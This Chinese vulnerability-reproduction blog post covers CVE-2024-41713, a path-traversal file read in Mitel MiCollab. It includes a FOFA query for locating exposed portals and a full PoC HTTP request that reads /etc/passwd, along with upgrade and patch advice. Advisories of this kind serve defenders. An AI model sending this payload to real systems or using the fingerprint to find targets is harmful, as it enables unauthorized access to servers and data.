「漏洞复现」Mitel MiCollab 企业协作平台 任意文件读取漏洞(CVE-2024-41713)

admin 2024年12月10日11:22:10评论51 views字数 1743阅读5分48秒阅读模式
「漏洞复现」Mitel MiCollab 企业协作平台 任意文件读取漏洞(CVE-2024-41713)

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02

产品介绍

Mitel MiCollab是加拿大Mitel(敏迪)公司推出的一款企业级协作平台,旨在为企业提供统一、高效、安全的通信与协作解决方案。通过该平台,员工可以在任何时间、任何地点,使用任何设备,实现即时通信、语音通话、视频会议、文件共享等功能,从而提升工作效率和团队协作能力。适用于各种规模和类型的企业。通过该平台,企业可以提升工作效率、增强团队协作能力、保障信息安全,并推动业务的持续发展。

0x03

漏洞威胁

由于Mitel MiCollab软件的 NuPoint 统一消息 (NPM) 组件中存在身份验证绕过漏洞,并且输入验证不足,未经身份验证的远程攻击者可利用该漏洞执行路径遍历攻击,成功利用可能导致未授权访问、破坏或删除用户的数据和系统配置。

影响范围:

version < MiCollab 9.8 SP2 (9.8.2.12)

0x04

漏洞环境

FOFA:

body="MiCollab End User Portal"
「漏洞复现」Mitel MiCollab 企业协作平台 任意文件读取漏洞(CVE-2024-41713)

0x05

漏洞复现

PoC

POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2HTTP/1.1Host: User-Agent: Mozilla/5.0 (WindowsNT10.0; Win64; x64; rv:132.0) Gecko/20100101Firefox/132.0Content-Type: application/x-www-form-urlencoded_transaction=<transactionxmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance"xsi:type="xsd:Object"><transactionNumxsi:type="xsd:long">2</transactionNum><operationsxsi:type="xsd:List"><elemxsi:type="xsd:Object"><criteriaxsi:type="xsd:Object"><reportName>../../../etc/passwd</reportName></criteria><operationConfigxsi:type="xsd:Object"><dataSource>summary_reports</dataSource><operationType>fetch</operationType></operationConfig><appID>builtinApplication</appID><operation>downloadReport</operation><oldValuesxsi:type="xsd:Object"><reportName>x.txt</reportName></oldValues></elem></operations><jscallback>x</jscallback></transaction>&protocolVersion=1.0&__iframeTarget__=x
「漏洞复现」Mitel MiCollab 企业协作平台 任意文件读取漏洞(CVE-2024-41713)

0x06

批量脚本验证

Nuclei验证脚本已发布知识星球:冷漠安全

「漏洞复现」Mitel MiCollab 企业协作平台 任意文件读取漏洞(CVE-2024-41713)

0x07

修复建议

建议使用受影响产品版本的客户更新到最新版本。

用户应升级到MiCollab 9.8 SP2 (9.8.2.12)或更高版本,以确保其系统免受此关键漏洞的影响。

对于那些无法立即升级的用户,Mitel 还为 9.7 及以上版本提供了一个补丁,在完成全面升级之前提供了一个替代解决方案,同时确保了安全性。该补丁的详细说明可在 Mitel 的知识管理系统 (KMS) 中找到。

0x08

原文始发于微信公众号(冷漠安全):「漏洞复现」Mitel MiCollab 企业协作平台 任意文件读取漏洞(CVE-2024-41713)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月10日11:22:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   「漏洞复现」Mitel MiCollab 企业协作平台 任意文件读取漏洞(CVE-2024-41713)https://cn-sec.com/archives/3488667.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息